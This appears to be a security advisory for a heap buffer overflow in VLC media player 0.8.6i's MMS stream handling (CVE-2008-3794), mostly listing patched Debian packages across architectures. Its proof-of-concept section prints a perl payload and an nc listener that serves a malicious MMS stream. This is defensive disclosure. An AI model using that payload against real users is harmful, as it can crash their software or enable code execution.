BID:30806 - VLC Media Player 'mmstu.c' MMS Protocol Handling Buffer Overflow Vulnerability

VLC Media Player 'mmstu.c' MMS Protocol Handling Buffer Overflow Vulnerability

BID:30806

Info

VLC Media Player 'mmstu.c' MMS Protocol Handling Buffer Overflow Vulnerability

Bugtraq ID:	30806
Class:	Boundary Condition Error
CVE:	CVE-2008-3794
Remote:	Yes
Local:	No
Published:	Aug 24 2008 12:00AM
Updated:	Jun 18 2009 08:19PM
Credit:	g_
Vulnerable:	VideoLAN VLC media player 0.8.6 i Pardus Linux 2008 0 Gentoo Linux Debian Linux 4.0 sparc Debian Linux 4.0 s/390 Debian Linux 4.0 powerpc Debian Linux 4.0 mipsel Debian Linux 4.0 mips Debian Linux 4.0 m68k Debian Linux 4.0 ia-64 Debian Linux 4.0 ia-32 Debian Linux 4.0 hppa Debian Linux 4.0 armel Debian Linux 4.0 arm Debian Linux 4.0 amd64 Debian Linux 4.0 alpha Debian Linux 4.0

Not Vulnerable:

Discussion

VLC Media Player 'mmstu.c' MMS Protocol Handling Buffer Overflow Vulnerability

VLC media player is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

VLC media player 0.8.6i is vulnerable; other versions may also be affected.

Exploit / POC

VLC Media Player 'mmstu.c' MMS Protocol Handling Buffer Overflow Vulnerability

An attacker can exploit this issue by enticing an unsuspecting user to open a malicious MMS stream with the vulnerable application.

The following proof of concept to create a malicious server is available:

perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot
nc -l -v -p 1755 < headshot

Solution / Fix

VLC Media Player 'mmstu.c' MMS Protocol Handling Buffer Overflow Vulnerability

Solution:
Updates are available. Please see the references for more information.

Debian Linux 4.0 amd64

Debian libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-s vn20061012.debian-5.1+etch3_amd64.deb

Debian libvlc0_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20 061012.debian-5.1+etch3_amd64.deb

Debian mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb
http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_ 0.8.6-svn20061012.debian-5.1+etch3_amd64.deb

Debian vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20 061012.debian-5.1+etch3_amd64.deb

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8 .6-svn20061012.debian-5.1+etch3_amd64.deb

Debian vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8. 6-svn20061012.debian-5.1+etch3_amd64.deb

Debian vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8. 6-svn20061012.debian-5.1+etch3_amd64.deb

Debian vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8. 6-svn20061012.debian-5.1+etch3_amd64.deb

Debian vlc_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn200610 12.debian-5.1+etch3_amd64.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0 ia-32

Debian libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_i386.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-s vn20061012.debian-5.1+etch3_i386.deb

Debian libvlc0_0.8.6-svn20061012.debian-5.1+etch3_i386.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20 061012.debian-5.1+etch3_i386.deb

Debian mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_i386.deb
http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_ 0.8.6-svn20061012.debian-5.1+etch3_i386.deb

Debian vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_i386.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20 061012.debian-5.1+etch3_i386.deb

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_i386.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8 .6-svn20061012.debian-5.1+etch3_i386.deb

Debian vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_i386.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8. 6-svn20061012.debian-5.1+etch3_i386.deb

Debian vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_i386.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8. 6-svn20061012.debian-5.1+etch3_i386.deb

Debian vlc-plugin-glide_0.8.6-svn20061012.debian-5.1+etch3_i386.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-glide_0. 8.6-svn20061012.debian-5.1+etch3_i386.deb

Debian vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_i386.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8. 6-svn20061012.debian-5.1+etch3_i386.deb

Debian vlc-plugin-svgalib_0.8.6-svn20061012.debian-5.1+etch3_i386.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-svgalib_ 0.8.6-svn20061012.debian-5.1+etch3_i386.deb

Debian vlc_0.8.6-svn20061012.debian-5.1+etch3_i386.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn200610 12.debian-5.1+etch3_i386.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0 arm

Debian libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_arm.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-s vn20061012.debian-5.1+etch3_arm.deb

Debian libvlc0_0.8.6-svn20061012.debian-5.1+etch3_arm.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20 061012.debian-5.1+etch3_arm.deb

Debian mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_arm.deb
http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_ 0.8.6-svn20061012.debian-5.1+etch3_arm.deb

Debian vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_arm.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20 061012.debian-5.1+etch3_arm.deb

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_arm.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8 .6-svn20061012.debian-5.1+etch3_arm.deb

Debian vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_arm.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8. 6-svn20061012.debian-5.1+etch3_arm.deb

Debian vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_arm.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8. 6-svn20061012.debian-5.1+etch3_arm.deb

Debian vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_arm.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8. 6-svn20061012.debian-5.1+etch3_arm.deb

Debian vlc_0.8.6-svn20061012.debian-5.1+etch3_arm.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn200610 12.debian-5.1+etch3_arm.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0 hppa

Debian libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-s vn20061012.debian-5.1+etch3_hppa.deb

Debian libvlc0_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20 061012.debian-5.1+etch3_hppa.deb

Debian mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb
http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_ 0.8.6-svn20061012.debian-5.1+etch3_hppa.deb

Debian vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20 061012.debian-5.1+etch3_hppa.deb

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8 .6-svn20061012.debian-5.1+etch3_hppa.deb

Debian vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8. 6-svn20061012.debian-5.1+etch3_hppa.deb

Debian vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8. 6-svn20061012.debian-5.1+etch3_hppa.deb

Debian vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8. 6-svn20061012.debian-5.1+etch3_hppa.deb

Debian vlc_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn200610 12.debian-5.1+etch3_hppa.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0 sparc

Debian libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-s vn20061012.debian-5.1+etch3_sparc.deb

Debian libvlc0_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20 061012.debian-5.1+etch3_sparc.deb

Debian mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb
http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_ 0.8.6-svn20061012.debian-5.1+etch3_sparc.deb

Debian vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20 061012.debian-5.1+etch3_sparc.deb

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8 .6-svn20061012.debian-5.1+etch3_sparc.deb

Debian vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8. 6-svn20061012.debian-5.1+etch3_sparc.deb

Debian vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8. 6-svn20061012.debian-5.1+etch3_sparc.deb

Debian vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8. 6-svn20061012.debian-5.1+etch3_sparc.deb

Debian vlc_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn200610 12.debian-5.1+etch3_sparc.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0 s/390

Debian libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_s390.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-s vn20061012.debian-5.1+etch3_s390.deb

Debian libvlc0_0.8.6-svn20061012.debian-5.1+etch3_s390.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20 061012.debian-5.1+etch3_s390.deb

Debian mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_s390.deb
http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_ 0.8.6-svn20061012.debian-5.1+etch3_s390.deb

Debian vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_s390.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20 061012.debian-5.1+etch3_s390.deb

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_s390.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8 .6-svn20061012.debian-5.1+etch3_s390.deb

Debian vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_s390.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8. 6-svn20061012.debian-5.1+etch3_s390.deb

Debian vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_s390.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8. 6-svn20061012.debian-5.1+etch3_s390.deb

Debian vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_s390.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8. 6-svn20061012.debian-5.1+etch3_s390.deb

Debian vlc_0.8.6-svn20061012.debian-5.1+etch3_s390.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn200610 12.debian-5.1+etch3_s390.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0 powerpc

Debian libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-s vn20061012.debian-5.1+etch3_powerpc.deb

Debian libvlc0_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20 061012.debian-5.1+etch3_powerpc.deb

Debian mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb
http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_ 0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb

Debian vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20 061012.debian-5.1+etch3_powerpc.deb

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8 .6-svn20061012.debian-5.1+etch3_powerpc.deb

Debian vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8. 6-svn20061012.debian-5.1+etch3_powerpc.deb

Debian vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8. 6-svn20061012.debian-5.1+etch3_powerpc.deb

Debian vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8. 6-svn20061012.debian-5.1+etch3_powerpc.deb

Debian vlc_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn200610 12.debian-5.1+etch3_powerpc.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0 alpha

Debian libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-s vn20061012.debian-5.1+etch3_alpha.deb

Debian libvlc0_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20 061012.debian-5.1+etch3_alpha.deb

Debian mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb
http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_ 0.8.6-svn20061012.debian-5.1+etch3_alpha.deb

Debian vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20 061012.debian-5.1+etch3_alpha.deb

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8 .6-svn20061012.debian-5.1+etch3_alpha.deb

Debian vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8. 6-svn20061012.debian-5.1+etch3_alpha.deb

Debian vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8. 6-svn20061012.debian-5.1+etch3_alpha.deb

Debian vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8. 6-svn20061012.debian-5.1+etch3_alpha.deb

Debian vlc_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn200610 12.debian-5.1+etch3_alpha.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0 armel

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0 m68k

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0 mipsel

Debian libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-s vn20061012.debian-5.1+etch3_mipsel.deb

Debian libvlc0_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20 061012.debian-5.1+etch3_mipsel.deb

Debian mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb
http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_ 0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb

Debian vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20 061012.debian-5.1+etch3_mipsel.deb

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8 .6-svn20061012.debian-5.1+etch3_mipsel.deb

Debian vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8. 6-svn20061012.debian-5.1+etch3_mipsel.deb

Debian vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8. 6-svn20061012.debian-5.1+etch3_mipsel.deb

Debian vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8. 6-svn20061012.debian-5.1+etch3_mipsel.deb

Debian vlc_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn200610 12.debian-5.1+etch3_mipsel.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0 ia-64

Debian libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-s vn20061012.debian-5.1+etch3_ia64.deb

Debian libvlc0_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20 061012.debian-5.1+etch3_ia64.deb

Debian mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb
http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_ 0.8.6-svn20061012.debian-5.1+etch3_ia64.deb

Debian vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20 061012.debian-5.1+etch3_ia64.deb

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8 .6-svn20061012.debian-5.1+etch3_ia64.deb

Debian vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8. 6-svn20061012.debian-5.1+etch3_ia64.deb

Debian vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8. 6-svn20061012.debian-5.1+etch3_ia64.deb

Debian vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8. 6-svn20061012.debian-5.1+etch3_ia64.deb

Debian vlc_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn200610 12.debian-5.1+etch3_ia64.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

Debian Linux 4.0 mips

Debian libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_mips.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-s vn20061012.debian-5.1+etch3_mips.deb

Debian libvlc0_0.8.6-svn20061012.debian-5.1+etch3_mips.deb
http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20 061012.debian-5.1+etch3_mips.deb

Debian mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_mips.deb
http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_ 0.8.6-svn20061012.debian-5.1+etch3_mips.deb

Debian vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_mips.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20 061012.debian-5.1+etch3_mips.deb

Debian vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8 .6-svn20061012.debian-5.1+etch3_all.deb

Debian vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_mips.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8 .6-svn20061012.debian-5.1+etch3_mips.deb

Debian vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_mips.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8. 6-svn20061012.debian-5.1+etch3_mips.deb

Debian vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_mips.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8. 6-svn20061012.debian-5.1+etch3_mips.deb

Debian vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_mips.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8. 6-svn20061012.debian-5.1+etch3_mips.deb

Debian vlc_0.8.6-svn20061012.debian-5.1+etch3_mips.deb
http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn200610 12.debian-5.1+etch3_mips.deb

Debian wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb
http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn2006 1012.debian-5.1+etch3_all.deb

References

VLC Media Player 'mmstu.c' MMS Protocol Handling Buffer Overflow Vulnerability

References:

[vlc-devel] commit: MMS integers handling fixes, including buffer overflow (VideoLAN)
VLC 0.8.6i MMS Protocol Handling (g_)
VLC Homepage (VideoLAN)